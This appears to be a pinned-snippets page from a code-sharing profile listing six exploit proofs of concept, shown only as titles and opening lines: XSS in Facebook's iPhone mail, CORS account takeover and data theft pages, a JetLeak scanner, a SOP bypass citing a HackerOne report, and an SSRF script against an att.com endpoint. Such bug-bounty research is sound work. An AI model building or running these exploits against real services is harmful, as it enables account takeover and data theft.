Pinned

1. iPhone app XSS in Facebook Mail iPhone app XSS in Facebook Mail

   1

   <script type="text/javascript" src="http://www.online24.nl/static/assets/js/jquery-1.4.4.min.js"></script>

   2

   <script type="text/javascript">

   3

       // http://iphone.facebook.com/photo_dashboard.php?endtime=1311780199&__ajax__&__metablock__=9

   4

       $(function(){

   5

           parse_messages = function()

2. Full Account Takeover through CORS w... Full Account Takeover through CORS with connection Sockets

   1

   <!DOCTYPE html>

   2

   <html>

   3

   <head><title>Exploiting CORS</title></head>

   4

   <body>

   5

   <center>

3. Vulnerable to JetLeak Vulnerable to JetLeak

   1

   import httplib, urllib, ssl, string, sys, getopt

   2

   import datetime

   3

   from urlparse import urlparse

   4

   5

   f = open('jetleak_' + datetime.datetime.now().strftime('%Y%m%d_%H_%M') + '.txt', 'w')

4. Cross Origin Resource Sharing Miscon... Cross Origin Resource Sharing Misconfiguration

   1

   <!DOCTYPE html>

   2

   <html>

   3

   <body>

   4

   <center>

   5

   <h3>Steal customer data!</h3>

5. SOP bypass using browser cache (http... SOP bypass using browser cache (https://hackerone.com/reports/761726)

   1

   <html>

   2

   <script>  

   3

   var url = "https://keybase.io/_/api/1.0/user/lookup.json?username={YOUR_USERNAME}";  

   4

   fetch(url, {    

   5

       method: 'GET',    

6. ssrf.py ssrf.py

   1

   import requests

   2

   3

   url = "https://onlinefaxtwo.att.com/loa.php"

   4

   5